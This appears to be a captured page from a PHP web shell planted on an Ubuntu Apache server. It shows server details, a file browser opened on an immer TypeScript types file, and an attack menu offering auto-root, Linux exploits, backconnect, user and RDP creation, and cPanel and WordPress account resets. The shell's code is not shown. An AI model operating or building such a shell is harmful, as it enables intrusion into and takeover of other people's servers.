Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
immer /
src /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
globals.d.ts
31
B
-rw-rw-r--
index.js.flow
4.31
KB
-rw-rw-r--
types-external.ts
8.2
KB
-rw-rw-r--
types-internal.ts
1
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types-internal.ts
import { SetState, ImmerScope, ProxyObjectState, ProxyArrayState, ES5ObjectState, ES5ArrayState, MapState, DRAFT_STATE } from "../internal" export type Objectish = AnyObject | AnyArray | AnyMap | AnySet export type ObjectishNoSet = AnyObject | AnyArray | AnyMap export type AnyObject = {[key: string]: any} export type AnyArray = Array<any> export type AnySet = Set<any> export type AnyMap = Map<any, any> export const enum Archtype { Object, Array, Map, Set } export const enum ProxyType { ProxyObject, ProxyArray, Map, Set, ES5Object, ES5Array } export interface ImmerBaseState { parent_?: ImmerState scope_: ImmerScope modified_: boolean finalized_: boolean isManual_: boolean } export type ImmerState = | ProxyObjectState | ProxyArrayState | ES5ObjectState | ES5ArrayState | MapState | SetState // The _internal_ type used for drafts (not to be confused with Draft, which is public facing) export type Drafted<Base = any, T extends ImmerState = ImmerState> = { [DRAFT_STATE]: T } & Base
Close